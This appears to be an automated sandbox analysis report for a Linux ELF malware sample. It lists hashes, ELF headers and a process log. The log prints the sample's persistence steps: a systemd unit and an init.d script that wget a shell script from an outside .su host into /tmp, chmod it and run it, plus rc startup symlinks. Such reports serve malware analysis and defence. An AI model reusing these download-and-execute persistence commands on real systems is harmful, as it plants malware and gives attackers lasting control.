                                  Malicious:false
                                  Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/x86_64.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://pen.gorillafirewall.su/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):76
                                  Entropy (8bit):3.7627880354948586
                                  Encrypted:false
                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                  Malicious:false
                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                  Entropy (8bit):6.170090518797771
                                  TrID:
                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                  File name:x86_64.nn.elf
                                  File size:80'256 bytes
                                  MD5:a43c7b0fb823947daaebc84fc7f18d51
                                  SHA1:c95a119ea56a0c2b107c7ef47e852ee74e8ac891
                                  SHA256:0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900
                                  SHA512:98f518415d6d8ba4670ca4ecdca9ab8d602a881de9a5f450121f6c6dbad87ee8321d4e13538cb8ec8440cdad8acee906ce5e157f2be1478ec340a98c04337099
                                  SSDEEP:1536:TETBpHwYwiiTKEZ3D1VLc43UMIIVD2rky1m2S1UX67R7lVC9M:EvHJtiTTZT15c4uWD2j1m2Smq7R7lVIM
                                  TLSH:13732A037580C0FCC499C278572B723AD937B07E2139B2A627E9FF266F89E605E1E554
                                  File Content Preview:.ELF..............>.......@.....@...................@.8...........................@.......@......&.......&.......................0.......0Q......0Q.............h/..............Q.td....................................................H...._....Z...H........

                                  ELF header

                                  Class:ELF64
                                  Data:2's complement, little endian
                                  Version:1 (current)
                                  Machine:Advanced Micro Devices X86-64
                                  Version Number:0x1
                                  Type:EXEC (Executable file)
                                  OS/ABI:UNIX - System V
                                  ABI Version:0
                                  Entry Point Address:0x400194
                                  Flags:0x0
                                  ELF Header Size:64
                                  Program Header Offset:64
                                  Program Header Size:56
                                  Number of Program Headers:3
                                  Section Header Offset:0
                                  Section Header Size:0
                                  Number of Section Headers:0
                                  Header String Table Index:0
                                  Program headers

                                  Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align     Prog Interpreter  Section Mappings
                                  LOAD       0x0      0x400000         0x400000          0x12610    0x12610      6.3718   0x5    R E                0x100000
                                  LOAD       0x13000  0x513000         0x513000          0x6c0      0x2f68       2.6753   0x6    RW                 0x100000
                                  GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x8
                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                  System Behavior

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:/tmp/x86_64.nn.elf
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/systemctl
                                  Arguments:systemctl enable custom.service
                                  File size:996584 bytes
                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/chmod
                                  Arguments:chmod +x /etc/init.d/mybinary
                                  File size:63864 bytes
                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/ln
                                  Arguments:ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
                                  File size:76160 bytes
                                  MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/chmod
                                  Arguments:chmod +x /etc/init.d/x86_64.nn.elf
                                  File size:63864 bytes
                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/mkdir
                                  Arguments:mkdir -p /etc/rc.d
                                  File size:88408 bytes
                                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/ln
                                  Arguments:ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf
                                  File size:76160 bytes
                                  MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:54:35
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:54:35
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:54:37
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:54:37
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:54:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:54:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:55:10
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:55:10
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:55:38
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:55:38
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:56:16
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:56:16
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:56:21
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:56:21
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/usr/libexec/gnome-session-binary
                                  Arguments:-
                                  File size:334664 bytes
                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/usr/libexec/gsd-housekeeping
                                  Arguments:/usr/libexec/gsd-housekeeping
                                  File size:51840 bytes
                                  MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/lib/systemd/systemd
                                  Arguments:-
                                  File size:1620224 bytes
                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                  File size:22760 bytes
                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e